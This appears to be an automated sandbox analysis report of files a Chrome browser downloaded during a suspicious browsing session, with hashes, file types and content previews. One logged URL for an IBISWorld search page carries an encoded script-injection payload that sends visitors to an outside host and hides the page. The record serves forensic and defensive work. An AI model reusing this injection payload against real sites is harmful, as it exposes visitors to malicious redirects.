                                                                                        Preview:/*!.. * Mmenu Light.. * mmenujs.com/mmenu-light.. *.. * Copyright (c) Fred Heusschen.. * www.frebsite.nl.. *.. * License: CC-BY-4.0.. * http://creativecommons.org/licenses/by/4.0/.. */:root{--mm-ocd-width:80%;--mm-ocd-min-width:200px;--mm-ocd-max-width:440px}body.mm-ocd-opened{overflow-y:hidden;-ms-scroll-chaining:none;overscroll-behavior:none}.mm-ocd{position:fixed;top:0;right:0;bottom:100%;left:0;z-index:9999;overflow:hidden;-ms-scroll-chaining:none;overscroll-behavior:contain;background:rgba(0,0,0,0);-webkit-transition-property:bottom,background-color;-o-transition-property:bottom,background-color;transition-property:bottom,background-color;-webkit-transition-duration:0s,.3s;-o-transition-duration:0s,.3s;transition-duration:0s,.3s;-webkit-transition-timing-function:ease;-o-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-delay:.45s,.15s;-o-transition-delay:.45s,.15s;transition-delay:.45s,.15s}.mm-ocd--open{bottom:0;background:rgba(0,0,0,.25);-webkit
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 300 x 300, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):93171
                                                                                        Entropy (8bit):7.965772005067425
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:8A5B78C20B598C249C5842249444A573
                                                                                        SHA1:633A2A9BB3D8B37FD95B90E10E55E3AA4DA33349
                                                                                        SHA-256:8350A42059CBA41E3CC8F21C739EE6390578ACF81D6BB3B9A8A1C3659A7DCBCD
                                                                                        SHA-512:95E795A9D3B818CBA52425CAAB0D1FA279DA04D548C818103BBF4412ED87B6711445E2B6CF3DB3BA9E6C0303F278DD717BE263C92DFC58F361AA04D108E461E5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/uploads/archive/product/561/images/dw.png
                                                                                        Preview:.PNG........IHDR...,...,........"....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):83
                                                                                        Entropy (8bit):4.54386549255919
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E29AAF2FFA7DF43E90F53CFADBCDEC00
                                                                                        SHA1:14925EAA99D94BCF24B86ABDC1CF6FE6DE69A9B9
                                                                                        SHA-256:97613986CD5849D93F20592A7277999101E50F463C45AA53FA3272024D218700
                                                                                        SHA-512:85BDF4F83143D4878798242AA9E97670C7E25DCA74D5DFC5FEECCE9425E43D4EE41EBBBDE4400D316234DE184E692461DB48201AA1923B1A3A69296CA090335B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"user":{"id":"efc81541-78d1-41fa-8675-8ccd4084ce41-tuctd33fb80","isNewUser":true}}
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):41
                                                                                        Entropy (8bit):4.552197126358234
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6C03F9677F6D355F944DA7BA9F9DE637
                                                                                        SHA1:87CA44DE54C62EA37F32B3265FED3C4E06DDAFD2
                                                                                        SHA-256:9FA2BBB4C27F55E1D9EF824FDFCB1459B34974B50426301FAC1B5F8D8F8790B1
                                                                                        SHA-512:50F35AB635533B39AF74E154B484095F1483CE0AC0586FAC611812833A588C582EEACD3B9B38C9C0BEBF3F50716E34836C8EB3DAC0463E89CA4E902976AB3F2D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/js/gbvar.js?v=21
                                                                                        Preview:const API_URL = "https://unisonroad.com";
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (5316), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):76854
                                                                                        Entropy (8bit):4.977789214441761
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:173634D3014A0EF0929C4CA5701E432D
                                                                                        SHA1:45DB9B608E90294B46DA78AE74C6321FD5C2F0CC
                                                                                        SHA-256:ADCFC75AC81D7EC2F57836D3ABB2318C571786D26D37C0041022EB0FF394764B
                                                                                        SHA-512:8853845EDF296B863BCC5BBDC44D9C99957E48BA1E4C5E839105B98EA5BFAB7CD67DA2AD60AD2144BE970A3A39CEEA05BCE7661A7CA45CB2780CB153B42D2CC1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%30
                                                                                        Preview:....<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. charset/viewport -->.. <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" />.. title/description/tags -->.. <script type="text/javascript" src="https://secure.detailsinventivegroup.com/js/787582.js"></script><title>Search | IBISWorld</title>.. <meta name="description" content="Search the complete list of IBISWorld.s industry research reports. We offer reports covering industries in Australia, Canada, China, Germany, Ireland, Mexico, New Zealand, the UK and the US. IBISWorld is the world.s leading provider of industry research, providing industry statistics, data, trends, and forecasts for thousands of global industries." />.. <meta name ="keywords" content="IBISWorld, industry research, industry analysis, industry
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65443), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):105218
                                                                                        Entropy (8bit):4.965756460513188
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C1D0AC0F3119C53EB81E21822879AA8A
                                                                                        SHA1:A6B280A667BAFD47053449310E1238F00BE8C2D2
                                                                                        SHA-256:91716B2F1294AEC5A7C50967D6A9F0525151796D7BACA51413D12BF82DD4BF4E
                                                                                        SHA-512:892D9F08848CF90608E7CA5F540E16C157A2FE07DB7227D531C7B8CB3E2232628354BE0A6A0BD09EEFC75E461B38123C31B89F4EDC8FB36AE859AC16EF36C04B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/js/jquery-3.7.0.js
                                                                                        Preview:./*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */..!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (ie, e) { "use strict"; var oe = [], r = Object.getPrototypeOf, ae = oe.slice, g = oe.flat ? function (e) { return oe.flat.call(e) } : function (e) { return oe.concat.apply([], e) }, s = oe.push, se = oe.indexOf, n = {}, i = n.toString, ue = n.hasOwnProperty, o = ue.toString, a = o.call(Object), le = {}, v = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, y = function (e) { return null != e && e === e.window }, C = ie.document, u = { type: !0, src: !0, nonce: !0, noModule: !0 }; function m(e, t, n) { var r, i, o = (n = n || C).
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 60832, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):60832
                                                                                        Entropy (8bit):7.996333456036775
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:D7E60F9D1433A45ED71817F6D23ABECA
                                                                                        SHA1:D22573ACFB7163487F48C8FCBD593F2EC5B9E729
                                                                                        SHA-256:4517F0A3893222DF073141313C178CCBC99343F3903FB12023173B0D9DE78AB9
                                                                                        SHA-512:A90C629100B3A9685CB40E7C1425283BDCC776A2F33ED81CD979F2A04B960566F5C825566E7B0EA3B6B7F152DC3FC5F816126E716229662B80F9FE1E36E8069A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://fonts.gstatic.com/s/materialicons/v47/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2
                                                                                        Preview:wOF2..................D...............................*.`..4.............d..6.$..v. ..z. [.#r..v{..m....&..bF...A"8.?.D.}.p;..e.....IC.....W.<.P.km.}..y\`.n-.{...X..UQC.a..L..c.....W......'..D....nQ?.o..08.08Fx ......p,........T.q.=..~..g}I...5/....l3..6J.A....o..|X'../.j.x........?..x..-...?.Au.3.p......H%...O...W...q..s.. W...X....L`H..>uB.J..pFu.i..0.6X.H6......."r.[k.BS.N....'._.z$uu.H.."...F..>.(..B2v.nw..!....o.hn....o.S.....R.....D.6`.I.=..,..Fh.3.gK..D..].u...~.\x#..o.s.r!TD..gK.I}.0vX........Bxq..!...4...).m..y...tM...#.8L........N..:.&..,......m.....-...s....NB~.p$.3...........}..........k....6.B[..^.tk..].....UZ..I.m...\..=...../g...b..>..R...Z`~P.K......Z....xP_$T..[.....$s4........X=.......O.~.!.r`..s.]*.^.Zo..7.._.r..A......8..6 .......~..Q=j.V/o.".".o?\.G...J.B.F.m..).rN).-.K.....O. L......OW..-4....?.\G..CaY..c.....h...G...*]...B....,$...C.......a...../..e..c3+...F..L.j.-9.UW".M..C.....9..S.g.3..6.{...v.l.p....H..:.~~._.....(.P...G....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (52564)
                                                                                        Category:downloaded
                                                                                        Size (bytes):52565
                                                                                        Entropy (8bit):5.093665685312628
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F3B568A991F3C1FA005856A2169A7460
                                                                                        SHA1:524A224BB95042AC5A6614617FBE80DFA25D7F2C
                                                                                        SHA-256:516679618BF0349CA357E1F1E107250CDB80B1720BE4A9C0AEFBBEDC6000CAC3
                                                                                        SHA-512:6EFB4AE1EF7E0D2B410CB72E4E549585A77E7039AB5D7054D258FECFB9EAB3D619037B5C146A4AD06B48AC75732E9DAEF36CBDF5DCB960E27DF7B17DC8E4186D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/css/dublin/dist/common-hybrid.css?v=fb00c92e59fc03510f7e6c64e8419364
                                                                                        Preview:input::-webkit-inner-spin-button,input::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}input:-webkit-autofill,select:-webkit-autofill{transition:background-color 5000s ease-in-out 0s}.sa_line_left,.sa_line_right{width:25px;display:inline-block;border-bottom:1px solid;margin-bottom:4px}.img_ind_bg{background-size:cover;background-position:center;z-index:-10;position:fixed;width:100%;height:100%}#questionFooterInp{font-size:16px}.qfinmob{display:none}.dubv4 .qoq_dub4{display:none!important}.dub_img_sp img{max-width:300px}#advEmailStandard #advEmailSub,#questionBody #email-data-btnU{border-bottom-left-radius:0!important;border-top-left-radius:0!important}#advEmailStandard #advEmailInput,#questionBody #email-dataU{border-bottom-right-radius:0!important;border-top-right-radius:0!important}#advEmailStandard .input_alone{display:inline-block;width:60%}.attention_mob{display:none}.dub_img_sp{margin-top:-60px;margin-bottom:20px}.hd.dub_ny_hd{margin-bottom:50px}.dub_bb_ny,.dub_bb_ny.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):1515
                                                                                        Entropy (8bit):4.294495050410994
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:929B16D636E777960298A84A14577741
                                                                                        SHA1:EB89EEEFD35949155B4C0DFEB825585E327E10A1
                                                                                        SHA-256:AC7EBAC0BDCC65369ED3C6C9F31044F92778A5BF358A308D6CC6B5718EFA4D8A
                                                                                        SHA-512:AE5B5C12E27D2141E02BC6DD6C552EE3712EA88692B2E6A732400C27CBDA79B72ABC702FB858815C4C3C5A11DC529996132C96A3A172DF52301824816FD8267A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-ca.svg
                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M1.53153 0.758545C0.869721 0.758545 0.333252 1.29501 0.333252 1.95683V10.043C0.333252 10.7048 0.869721 11.2413 1.53153 11.2413H3.91947V0.758545H1.53153Z" fill="#FF4B55"/>..<path d="M15.135 0.758545H12.7471V11.2413H15.135C15.7968 11.2413 16.3333 10.7048 16.3333 10.043V1.95683C16.3333 1.29501 15.7968 0.758545 15.135 0.758545Z" fill="#FF4B55"/>..<path d="M10.0072 7.21128L11.6442 6.27591L11.2686 6.08809C11.1632 6.03541 11.1029 5.92166 11.1185 5.80487L11.2407 4.88856L10.5477 5.09019C10.3946 5.13475 10.2357 5.04056 10.2013 4.88491L10.1349 4.58491L9.4842 5.34647C9.39401 5.45203 9.22214 5.37141 9.24567 5.23456L9.52357 3.61869L9.0981 3.73503C8.97382 3.76903 8.84257 3.71247 8.78198 3.59878L8.33395 2.75906V2.75781L8.33364 2.75844L8.33329 2.75781V2.75906L7.88526 3.59878C7.82461 3.71244 7.69336 3.769 7.56907 3.73503L7.14361 3.61869L7.42151 5.23456C7.44504 5.37137 7.27317 5.45203 7.18295 5.3465L
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65326)
                                                                                        Category:downloaded
                                                                                        Size (bytes):160392
                                                                                        Entropy (8bit):5.078030630836827
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:023B3876BB73AA541367FC40A193D2B7
                                                                                        SHA1:8ED2D6350D23F857D92805737D0F97C675DE666B
                                                                                        SHA-256:F77C0D1739B618EDC4A01CA3F6B2990B01A3009030AF49EE8CF68E83052DF194
                                                                                        SHA-512:A1CF7E5D2B351F6E37FC544DF51C3AD859FC12DC631185875D1BE34B8DD8B6E7847B06D2E8E6DF5DC24DCA88631EA54A14FA175D4C7073EAB52BB0DE7BABEFF6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css
                                                                                        Preview:/*!. * Bootstrap v4.5.3 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 250 x 135, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):16452
                                                                                        Entropy (8bit):7.9707386640219795
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A7799F18D72A653082DE96B7CF6A89A1
                                                                                        SHA1:11836C1D01157C80C845EA216A4314CB3150FC6C
                                                                                        SHA-256:44D3FD4B4BDB0FECA600BBC7807F26C5CC82E25616E37815EF0816CDA2C64F2E
                                                                                        SHA-512:D08A00C6AAE9AB721CE255E944643CBE1FFA42C1B32E5326D850C739B427299293529C8B126F008B88B4679E5EED30D8715C0373A732DCE8402B6D723071B59E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR.............?PD"....pHYs..........+.... .IDATx..}y.....S..... ..... A$....@.K..5..#..1jLb|. .D.'.G.QAP.QDDDD...H..]v.......=GwOUw..,..>...tw....Y...OD&.>jW...........p.!|.......t!_t1..._.R.wD..i..~...]MO......]...~.|.....@p.27n...i.B..A...`.{.p..&u...v%=].B..bt....X..[...P.....$u..y...mh[1..M7.........4z.:5.&.#!2v.p.}...B..<..A.:`.n.f.v.q].B....I.]8..7.L...'. c......e.u..y...`.....iE.I..i.ht....](....@.#..-~m...1xR.s.<p'.....?zF.\4..7G...E..H2...r]...3:.j.M0L...._..m...}{u.s.G.q#'...........s.4{..U;...t....2z.%.1.!.(cV@...k....tJ..].....t.S`.Lv..q.....1....I.D.w.x.....o...+.F(om...,V<..X...c.....dv!..('.DN.9.ooZ...%.s?........nW.v..gO..^}./.o...<.p.3.....P..up.'.....0.4..m.d#....~."m.>..E......._.........a..o......'.../^.....r55V~...o:.....<....T[[Q..JW.......k{.te.{...&......#G.|;....y....kB.....w....v'4OD..B.g...3`..`.}........#..........,.d...V..x...%.P0....v.h......:.......<u.A.%.J..?.m..a.ab......t.......x.>t
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):3122
                                                                                        Entropy (8bit):7.919502433485332
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:270DDABD74213EB4F48443807395318D
                                                                                        SHA1:43D17E22CB97AA728E6FBFDC0FE22A113D9E9884
                                                                                        SHA-256:FEFE8C1BC3A1C4B8FE601F84891259DA276AAC03092FFDC8145CCE8400893289
                                                                                        SHA-512:76077AC5F669A4F52216360EC4319B67136DB34347A2256F43F61AE0C479339738CE3BD5C65C33C5472F5199965758DA374684744DEA4253D25C80A3C34C504D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/670/346/192_6_1710858046374.webp
                                                                                        Preview:RIFF*...WEBPVP8X..............ALPH.......m.a..3+++F...m.m..W.m.m...m.Z.q.0..;3..........iZ..8.....G......^F-h.C0....o].1..f4...u.r....u.j...6qIZ}"v. .>nh......^..#'.NM..;...D8..I..'|..G...)...k..A..Q....z#...J.........R..v..\Pi..#.?..P....<..[>..s.......%.J.ySt.....y..E...|.._...O.).&......\"...>!..$(.-...>..}.......<..y42..-'[..L.o.Nf...Y...m...).DF.......)+e..D..[....r@.>..c...Id.o2M.d..f....z..k]..!.M.{...*.U....Q....Y9..w.(e.NB......&..V..O....`.\...s...+s^.....K.....>o....2..l..{."..~.......}....y.Q.H.V.Q.*... ...k%...Q..(."!:.;.d..D..Jw...-yd......=..Y..1.}=v...0....Yh..<......F..... 5.....<.. .wcl.i/..R.k.<q.......O..{4.t....J...@...>"U.../.q..j..$...A..`BV...M...yH..Fy..P ...J....)H.%.!..C.|.W..&.-....w._}v../...}.)..(.Ea#...$..].z.gT.\~ ..-.y..o2k@..C.lF.{...o.K,-.....a6.G.)..Z...}..~....X..jB....i`&......#..@.". ..f. ./R.~.l..;P...0d.8.E..]...mB.n........ ..."..%_..~'-....u......8-2)=.........=.$....:)....o.#..nh,(A."bg2..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (31975)
                                                                                        Category:downloaded
                                                                                        Size (bytes):135455
                                                                                        Entropy (8bit):5.320837681472584
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6AE508844C659F9B9637B8599F1516DF
                                                                                        SHA1:27BE3C9B9EEAD216C467526257502A3B4FB1E668
                                                                                        SHA-256:D9153E6540A466422DA8C3FABA86A5AEF16380B9141A1FB671B7E0ABEDB8C68C
                                                                                        SHA-512:0126982252B14D4C326FA8C190FACD240B1B87673BC8DCEE2CDCDAC08FD0ACF65493D79EE80E2FF3B2094528FFF66902158D100E0737139A08DCE84B11BE91DE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/algoliasearch-helper@2.23.2/dist/algoliasearch.helper.min.js
                                                                                        Preview:!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var t;t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,t.algoliasearchHelper=e()}}(function(){return function e(t,r,n){function i(s,o){if(!r[s]){if(!t[s]){var c="function"==typeof require&&require;if(!o&&c)return c(s,!0);if(a)return a(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var f=r[s]={exports:{}};t[s][0].call(f.exports,function(e){var r=t[s][1][e];return i(r||e)},f,f.exports,e,t,r,n)}return r[s].exports}for(var a="function"==typeof require&&require,s=0;s<n.length;s++)i(n[s]);return i}({1:[function(e,t,r){"use strict";function n(e,t,r){return new i(e,t,r)}var i=e("./src/algoliasearch.helper"),a=e("./src/SearchParameters"),s=e("./src/SearchResults");n.version=e("./src/version.js"),n.AlgoliaSearchHelper=i,n.SearchParameters=a,n.SearchResu
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70", baseline, precision 8, 250x334, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):13009
                                                                                        Entropy (8bit):7.9491366472585625
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F9672941510EB627E3A8F7B67B69AD0D
                                                                                        SHA1:646B2F5DB5A18DA7E42A290BB1CB874E25C0BF90
                                                                                        SHA-256:E7258E896D9E33098439017E3316549A5CC082E8154356117133AA1822936833
                                                                                        SHA-512:79DFDA142049F784FEDF2BA29304FE796B6E6085663CA50C2D8AEE7A8283D238375290DE0F9169293BA3C96CF1D20E8C49C41C4864A04AD9B82674E205B73F1D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......N...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....9........J.c.q.].)........s..C.Fj_.J...t..4.,Y.....V.UY".{.."..k.e.h...u..|Ub..(."...#...S.......Y..yl.O.X<TN~u.d.U.o..q.".h....i....f..i.....3.......74n..v..s55Co..T...E/jLP......L.....m.7..p?JR..CN.M...6..i6.}......QE.i.P:R.A.&)...#"....D[.....#Un./.@......c.7...k...F......t.......;.Iz.........?.I...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (32005)
                                                                                        Category:downloaded
                                                                                        Size (bytes):41109
                                                                                        Entropy (8bit):5.292690182357533
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C2D71F042C879659DBC97F8853B62F21
                                                                                        SHA1:284416885E4E80E27FA4EAE6FC305F4DE15B914C
                                                                                        SHA-256:E6B390C2FBC974CF680D8418086CDA26EB93CBA49400B8E66B73ADCC41B224CD
                                                                                        SHA-512:49923E134257A3C4F489F7421257D7ECE79EAEF9E4EAD349048C4ECE0C2F9ACD86AB67216A9257B1AA9D76317CE7D97F15BA6507FA92B9B06A6043E110885B50
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/algoliasearch@3/dist/algoliasearchLite.min.js
                                                                                        Preview:/*! algoliasearch 3.35.1 | . 2014, 2015 Algolia SAS | github.com/algolia/algoliasearch-client-js */.!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var t;t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,t.algoliasearch=e()}}(function(){var e;return function t(e,r,o){function n(a,s){if(!r[a]){if(!e[a]){var u="function"==typeof require&&require;if(!s&&u)return u(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var l=r[a]={exports:{}};e[a][0].call(l.exports,function(t){var r=e[a][1][t];return n(r?r:t)},l,l.exports,t,e,r,o)}return r[a].exports}for(var i="function"==typeof require&&require,a=0;a<o.length;a++)n(o[a]);return n}({1:[function(e,t,r){(function(o){function n(){return!("undefined"==typeof window||!window.process||"renderer"!==window.process.type)||("undefined"!=typeo
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):5033
                                                                                        Entropy (8bit):4.191932047793786
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C961BED2DC5A57DBBF23A7CC9B52B17E
                                                                                        SHA1:D931551D4B5CA99524EB7D5DC46AD8881EE77D7A
                                                                                        SHA-256:820D78E161BB4FEC1EBB7099B6B99E47B08D1A90D8E2258A02204B2EF5F8A05D
                                                                                        SHA-512:B4D957B0EAA293437278D2DAAA0FAF8D675FF550B6B025F91F9C9EC0354A0C7AEB8E4017468CCF13A20B22BC61F1174DEEB9A04705088C14E7C8B621B1F4A3C0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-au.svg
